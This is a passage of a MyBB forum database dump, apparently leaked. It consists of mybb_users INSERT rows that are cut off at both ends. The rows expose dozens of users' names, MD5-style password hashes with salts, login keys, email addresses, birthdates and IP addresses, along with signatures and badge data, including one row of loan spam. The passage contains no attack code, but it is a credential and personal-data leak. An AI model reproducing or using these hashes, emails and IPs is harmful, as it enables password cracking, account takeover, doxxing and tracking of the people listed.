'0', '', '1349443767', '1349733872', '1349733872', '0', '', '0', '', '', '', '1-1-1991', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '1', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '108.171.103.234', '108.171.103.234', '1823172586', '1823172586', '', '7', '1', '20', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:1:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '11'); INSERT INTO mybb_users VALUES('250', 'Theodore Bagwell', '106c6722bde84eccfc9a3200864a43c7', 'sZh8XV8P', '3XpNT3UZ7vRliA3lYNIECKY8QMYBDQL4JXB6jgQTKwD325kLMK', 'matthew2229@yahoo.com', '0', '', '', '', '2', '', '0', '', '1349814285', '1350433718', '1349836505', '0', '', '0', '', '', '', '4-6-1986', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '24.61.32.100', '24.61.32.100', '406659172', '406659172', '', '2762', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('251', 'Banekitty', '7e8f1bb2be5bb4f9feaa62786f92c1ad', 'YCy5Ebs7', 'ZX8na74yU4InV6KA7lMQhdRxLbi5dqXsCtz53sje3U57hd6Jov', 'banekitty@nospam.ze.tc', '0', '', '', '', '14', '', '0', '', '1349923958', '1350525693', '1350525693', '0', '', '0', '', '', '', '1-1-1991', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '1', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '177.142.119.28', '108.171.103.148', '-1316063460', '1823172500', '', '2781', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('252', 'k3h3d5', 'ad451e890f4645feae4f2d0a04c61619', 'glYjzzeO', 'YIRppxvoFnMuz5WmeLDebdDb5Du9TSNWCJLY5fT6JFhfFlUjZA', 'dons.juan@live.com', '1', './uploads/avatars/avatar_252.jpg?dateline=1349983314', '120|90', 'upload', '2', '', '0', '', '1349982291', '1350065894', '1350063838', '1349983084', '', '0', '', '', '', '16-7-1983', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '110.137.72.228', '180.251.249.167', '1854490852', '-1258554969', '', '3785', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('253', 'GlowingCapes', '9527b72f1ae9d9318e0b142b7e3dad1c', 'FgvMq1wu', '27ociiH7goxaA1O7vMpHiajNh9zqnnMK2EHbk1VF3wKRXG2Pv8', 'skymd.duffeh@hotmail.com', '16', './uploads/avatars/avatar_253.png?dateline=1350036575', '100|100', 'upload', '2', '', '0', '', '1350035445', '1350439381', '1350174520', '1350438661', '', '0', '', '', '', '2-4-1998', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '173.76.159.245', '173.76.159.245', '-1387487243', '-1387487243', '', '7108', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '2'); INSERT INTO mybb_users VALUES('255', 'sbhshroy2', 'a6c5bba434b57812a32abcc74064d620', 'w5NC1QmN', 'VI3P7nFieXmRFtWdk5JNd2ebazkhyZAXiDQTB9QV1HxSvzWuhe', 'sbhshroy2@gmail.com', '23', '', '', '', '9', '', '0', '', '1350099222', '1352373119', '1352135735', '1352024025', '', '0', '', '', '', '20-4-1992', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '5.5', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '3', '27.62.200.63', '27.97.172.200', '457099327', '459386056', '', '15770', '1', '10', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:2:{s:4:\"acid\";a:2:{i:18;a:5:{s:4:\"acid\";i:18;s:4:\"name\";s:23:\"Advanced BH Contributor\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_23_54.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '10'); INSERT INTO mybb_users VALUES('254', 'Greed', 'd7de365b4910258830ac231c3c7f512a', '33hw1XdL', '6aMDqxRvYcqXcfV8WB76YvWphtrKKTzGhEwYNJeZ7aMzg6ysmG', 'ultimatevikingnipples@hotmail.com', '45', './uploads/avatars/avatar_254.png?dateline=1350058956', '120|76', 'upload', '14', '', '0', 'I Am Greed', '1350057258', '1350795518', '1350795518', '1350409520', '', '0', '', '', '', '21-10-1993', 'all', 'See, I\'m Greed. I want everything you can think of. Money and women, power and SEX. I want everything this world\'s selling and eternity\'s topping the list!\r\n[img]http://t3.gstatic.com/images?q=tbn:ANd9GcQqdkd2C5FurtyEleCFGwcIedVZ7LfOpmyqeDvcG4Yga1HcyLv90Br4ZAib[/img]', '1', '0', '0', '1', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-5', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '1', '0', '1', '63.153.255.202', '63.153.255.202', '1067057098', '1067057098', '', '35342', '1', '18', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '8'); INSERT INTO mybb_users VALUES('256', 'Andrew', '8bc54b10ea766dc4474b5998e623aa3f', 'Lfx2SzRg', 'dAEQp6zoRAgSW1wepjEkLhSzpEaQjPVuHgX2A8AtOEf8AlKHzs', 'drew-305@hotmail.com', '1', '', '', '', '2', '', '0', '', '1350102615', '1350137823', '1350135668', '1350102912', '', '0', '', '', '', '1-3-1994', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '232', '0', '0', '76.105.69.111', '76.105.69.111', '1281967471', '1281967471', '', '1111', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '1'); INSERT INTO mybb_users VALUES('257', 'XxTREYZxX', '1e10513003095e999b2d3633de492daa', 'kzLLEF4t', 'xS88CvB1ro6kzxHcIUTE3bFzNT83DjcYT7wJrlymldvuTc5JaD', 'treyz123456789@hotmail.com', '434', 'http://topminecraft.net/uploads/avatars/avatar_229.gif?dateline=1309773531?dateline=1351564570', '100|100', 'remote', '9', '17', '17', 'I WAS TREYZ', '1350111235', '1352750899', '1352698204', '1352618907', '', '0', '', '', '', '22-8-1998', 'all', '[img]http://media.tumblr.com/tumblr_m1ms9rztj21qbe1z0.gif[/img]', '1', '0', '0', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-2', '0', '2', '82', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', 'hello peeps', '0', '5', '13', '203.104.11.2', '203.104.11.14', '-882373886', '-882373874', 'english', '270778', '1', '126', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:4:{s:4:\"acid\";a:21:{i:20;a:5:{s:4:\"acid\";i:20;s:4:\"name\";s:7:\"Thinker\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_27_19.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:3;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:4;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:5;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:6;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:7;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:8;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:9;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:10;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:13;a:5:{s:4:\"acid\";i:13;s:4:\"name\";s:5:\"Gamer\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_15_49.gif\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:11;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:12;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:14;a:1:{s:11:\"showpostbit\";i:0;}i:15;a:1:{s:11:\"showpostbit\";i:0;}i:16;a:1:{s:11:\"showpostbit\";i:0;}i:17;a:1:{s:11:\"showpostbit\";i:0;}i:18;a:1:{s:11:\"showpostbit\";i:0;}i:19;a:1:{s:11:\"showpostbit\";i:0;}}s:0:\"\";a:1:{s:0:\"\";a:2:{s:11:\"showpostbit\";i:1;s:11:\"showprofile\";i:1;}}s:4:\"apid\";a:3:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:2;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}}s:4:\"atid\";a:2:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}}}', '46'); INSERT INTO mybb_users VALUES('316', 'luc1f3r.n008', 'a0e740d20aa3ed7d5331e33cbd562056', 'Cp5KtdHq', 'P1vCLKI7wyekj4iH8isxG1XvzSWs37mAuDUIHK3cUgMaIWNdFl', 'luc1f3r.n008@gmail.com', '1', '', '', '', '2', '', '0', '', '1351963127', '1352018730', '1351965260', '1352018424', '', '0', '', '', '', '18-12-1990', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '106.208.57.89', '106.206.163.177', '1792031065', '1791927217', '', '1247', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('258', 'PiXEL^OG', '5e99f9400a9fad5f4aa1e0a689efa2f1', 'dMsT2KO3', 'I29o3PJxFMeVQOFbaUSJPNJ3Fov9jwwRc9jgoEFEZ5LdZXm2gb', 'vemvillhadenna@hotmail.com', '71', './uploads/avatars/avatar_258.png?dateline=1350630690', '38|38', 'upload', '9', '', '0', 'FUCK THE POLICE', '1350115926', '1352715427', '1352713827', '1352526732', '', '0', '', '', '', '18-5-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '3', '139.190.235.246', '173.245.51.11', '-1950422026', '-1376439541', '', '63392', '1', '25', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:1:{s:4:\"acid\";a:8:{i:15;a:5:{s:4:\"acid\";i:15;s:4:\"name\";s:12:\"Silver Brick\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_18_16.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:3;a:1:{s:11:\"showpostbit\";i:0;}i:4;a:1:{s:11:\"showpostbit\";i:0;}i:5;a:1:{s:11:\"showpostbit\";i:0;}i:6;a:1:{s:11:\"showpostbit\";i:0;}}}', '4'); INSERT INTO mybb_users VALUES('259', 'MeowMeow', '5ce7218cc5a908f443a506e5c6cd0792', 'GjpR4xdN', 'fCZXNCl3j6tkr7wwcEcUn38SbQBNfNMU8iKxyrHS8iJC6kl89M', 'anonymousforeva@hotmail.co.uk', '2', '', '', '', '2', '', '0', '', '1350176549', '1351509401', '1350992368', '1350992367', '', '0', '', '', '', '1-1-1990', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '124.187.6.178', '101.163.15.100', '2092631730', '1705185124', '', '854', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('260', 'micheal010', '8d23014b90718e22a1ca8ab592a44a88', 'ul3idisP', 'soFlQXiuWxlP5BuNMECuU6cVQgZgxfV9Z5GuUJzJGL8E1lwXV8', 'rowlandandc1@gmail.com', '1', '', '', '', '2', '', '0', '', '1350219142', '1350938297', '1350336610', '1350938250', '', '0', '', '', '', '1-1-1986', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '41.190.2.8', '196.46.245.50', '700318216', '-1003555534', 'english', '6890', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('261', 'alexela84', '5af540f8225075ebe132b41a79cc7420', 'aijhKCPb', 'aa98vwF3DEpHvYMNaoXeBMRUwBhpCtYitUctP19oQCFs7hkgRa', 'alexela84@gmail.com', '0', '', '', '', '2', '', '0', '', '1350224829', '1350225214', '1350224829', '0', '', '0', '', '', '', '9-12-1984', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '84.85.88.250', '84.85.88.250', '1414879482', '1414879482', '', '385', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('262', 'RAND0M1ZER', '1ad17b5e5de2d09cb0a73de3abd92fb6', 'wxk8RULR', 'WUsq9reM5VjakzMIyw4LunjS4l8Ceqyy739IqLmYorEMPkhdih', 'erik.b22@gmail.com', '20', '', '', '', '2', '', '0', '', '1350250195', '1352619851', '1352422992', '1352619849', '', '0', '', '', '', '22-11-1992', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '108.162.138.186', '108.162.138.186', '1822591674', '1822591674', '', '3853', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('263', 'MerrillC1941', '831947362016f51ce94b8cbe22058fc6', 'wFctOCa4', 'oOqIQTlgDybspoonJHqo4HMOLFUqgl5uAMV44zg7MdkUmNMcOr', 'Kishacla6372@yahoo.com', '0', '', '', '', '2', '', '0', '', '1350353250', '1350354643', '1350353250', '0', 'http://ostatic.org/member/whileminahenson2004', '0', '', '', '', '25-6-1973', 'all', '[url=http://ostatic.org/member/richardjoyner1942]advance payday loan[/url] [url=http://www.extratasty.com/profile/59605/cameranleon1969]cash advance with no bank account[/url]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '129.121.100.27', '129.121.101.56', '-2122750949', '-2122750664', '', '12', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('266', 'King Of Dunces', 'ad736145097607f6993200b17007be66', 'XHTHvcyL', 'Z2j2kQVWGQUUCahZYBNHn6egXsJ2uJsVmENZKiKk1CYHoIMkC1', 'bleach505_ich@hotmail.com', '0', '', '', '', '7', '', '0', '', '1350422573', '1350478892', '1350478892', '0', '', '0', '', '', '', '10-7-1987', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '67.221.255.12', '63.153.255.202', '1138622220', '1067057098', '', '2620', '1', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('264', 'D?ea', '65965b266a52ba13f0b1fab60263754b', 'H8Lnmzck', 'kP4UukhHGPbbgXe8IAnVjjPqPS2jcMw4zWzROvLI6a2IJp1y9k', 'blackwhitecoder@live.dk', '56', 'http://wizardforums.com/uploads/avatars/avatar_1389.png?dateline=1350472999', '100|100', 'remote', '2', '', '0', '', '1350398790', '1351696461', '1351456039', '1351696461', '', '0', '', '', '', '26-3-1990', 'all', '[align=center][img]http://i.imgur.com/GgMTS.jpg[/img][/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '2', '1', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '178.157.194.171', '178.157.194.171', '-1298283861', '-1298283861', '', '23318', '1', '4', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'a:2:{s:4:\"acid\";a:3:{i:20;a:5:{s:4:\"acid\";i:20;s:4:\"name\";s:7:\"Thinker\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_27_19.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:1:{s:11:\"showpostbit\";i:0;}}s:0:\"\";a:1:{s:0:\"\";a:1:{s:11:\"showpostbit\";i:1;}}}', '7'); INSERT INTO mybb_users VALUES('265', 'Ryan', 'b4f5569280f4e05c4928205d03df50e8', 'iVLD9nmO', 'XO61Mt9BioqQEJUloIcE2yUynkeJEfqs9znmYxmZGdEqLxxegt', 'ryanseymour09@hotmail.com', '1', '', '', '', '2', '', '0', '', '1350412416', '1351792594', '1350412736', '1351792445', '', '0', '', '', '', '9-4-1990', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '78.143.155.3', '78.143.155.3', '1318034179', '1318034179', '', '618', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('267', 'Y0shi', '3e50f25035ddd0ab494e7a972bd10fb2', 'wCKOPQVq', 'GQf7O6vGriMw1Aaktcw5lAD4AEszufB4l1ujvVchPBaiwOeNOW', 'fb_tis@hotmail.com', '0', '', '', '', '2', '', '0', '', '1350455939', '1350456684', '1350455939', '0', '', '0', '', '', '', '20-9-1992', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '110.143.162.220', '110.143.162.220', '1854907100', '1854907100', '', '745', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('268', 'pushed', 'e885c9cce30e7c27772c974c8a23fed3', 'SXYW6dc2', 'IDGKktfaAOiapzzQ7eDap4jxBUSqTRXpnflU9rAC6sYQcQWS6z', 'pushed@ymail.com', '0', '', '', '', '2', '', '0', '', '1350487586', '1351515920', '1351512603', '0', '', '0', '', '', '', '5-9-1977', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '206.82.167.137', '206.82.167.137', '-833443959', '-833443959', '', '1857', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('270', 'LCS', '06d6ead18fefaa0e1b048a7242666245', 'Uc8XXqNj', 'uQi4QaVhOyYFUHYl1WLRw3Ri8G6AvCjsGbBRqqYaH69ZA9usDv', 'marketing@efyu.net', '10', './uploads/avatars/avatar_270.gif?dateline=1350500229', '120|120', 'upload', '2', '', '0', '', '1350499356', '1350912932', '1350844387', '1350651248', '', '0', '', '', '', '17-12-1994', 'all', '[align=center][url=http://www.efyu.net/?join=2][img]http://www.efyu.net/signature/signature.gif[/img][/url][/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '228', '0', '3', '2.124.223.31', '2.124.223.31', '41738015', '41738015', '', '9947', '1', '6', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '2'); INSERT INTO mybb_users VALUES('272', 'YuckFou', '74fc7aed51248c1be37fed47fff40347', 'ATp2K1jl', 'Hlo8vssZWFgGZP22nTtg5kecTHiwvGP9Rf6YP7Wf3VIw1ERNsR', 'troll@monemail.fr.nf', '3', '', '', '', '2', '', '0', '', '1350496931', '1350664095', '1350528000', '1350527053', '', '0', '', '', '', '1-1-1991', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '108.171.103.148', '171.25.193.21', '1823172500', '-1424375531', '', '1749', '1', '7', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '3'); INSERT INTO mybb_users VALUES('274', 'saevio99', 'eca6eb16423d5493fab19837a5b36630', '8N3UHEbB', 'ZKADL5Em2Q4n6NV83SjgydinjxuRLvDLys3jSDdsGgPIXdoHgQ', 'saevio99@gmail.com', '0', '', '', '', '2', '', '0', '', '1350533122', '1350800178', '1350800178', '0', '', '0', '', '', '', '12-9-1991', 'all', '', '1', '1', '2', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '1.38.16.226', '1.38.17.131', '19271906', '19272067', 'english', '392', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('276', 'ddeus', '66f43c75505ebf954ea6df3afe63b040', 'uC9pWGfn', 'A8AKwFjRmz5wPjNvXN8fZya8ZSsOj87zcH9DVuyny8P7xvTaEH', 'dunk.cooper@gmail.com', '0', '', '', '', '2', '', '0', '', '1350576634', '1350577249', '1350576634', '0', '', '0', '', '', '', '1-1-1980', 'all', '', '1', '1', '0', '1', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '66.162.121.76', '66.162.121.76', '1117944140', '1117944140', '', '617', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('277', 'STaRDoGG', 'd70535a8dbfe8fee13e96cf7c446c9b1', 'eoYKn3Eh', 'MWFe6bKpv1qoUdjZpN18rGOEfoE4RCQRFF4vWEqRPIqJmuTqzI', 'geekdroponline@gmail.com', '0', '', '', '', '2', '', '0', '', '1350590616', '1350603201', '1350601076', '0', 'http://geekdrop.com', '0', '', '', '', '22-1-1971', 'none', '', '0', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-5', '0', '2', '', '', '0', '1', '1350603168', '', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '67.175.153.67', '67.175.153.67', '1135581507', '1135581507', 'english', '2486', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('278', 'Yoess', 'ed5f4f5a7eb9c7851fcd8b702805df7d', 'Sj8D1Cpt', '39eNi1WdxxB4s7MLFYUDxMhN5mgVH8hBqjBqtJ1ydkD3Dltj5c', 'ybossenbroek@unic-utrecht.nl', '1', '', '', '', '2', '', '0', '', '1350600185', '1350615056', '1350611973', '1350600629', '', '0', '', '', '', '7-10-1996', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '228', '0', '4', '82.157.58.115', '82.157.58.115', '1386035827', '1386035827', '', '1004', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '1'); INSERT INTO mybb_users VALUES('279', 'katemory', '656535efa0b0c73db3c028b862a9eb56', '8UMohutm', '4nnqr5nMPunJrefw7F7GzFxKgd31syL6LJyuFiWCCe2tL1Z4Gl', 'briekronnick@yahoo.com', '0', '', '', '', '2', '', '0', '', '1350637912', '1350638156', '1350637912', '0', '', '0', '', '', '', '1-1-1980', 'all', '', '1', '0', '0', '1', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '122.162.83.200', '122.162.83.200', '2057458632', '2057458632', '', '244', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', NULL, 'b:0;', '0'); INSERT INTO mybb_users VALUES('280', 'Judge', '7258c4a8be0bea29b3ab812bd6dec93d', 'kOLkQFK3', 'LMTC8lg39TQc9QUWAFU2lO3w4lxhWmVfwrMDsgEOnYQV349ZnQ', 'judge@activist.com', '0', './uploads/avatars/avatar_280.jpg?dateline=1350686154', '80|80', 'upload', '2', '', '0', '', '1350641658', '1350686343', '1350682891', '0', '', '0', '', '', '', '26-11-1958', 'all', '', '1', '1', '0', '0', '1', '0', '0', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '0', '1', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '78.105.190.251', '78.105.190.251', '1315553019', 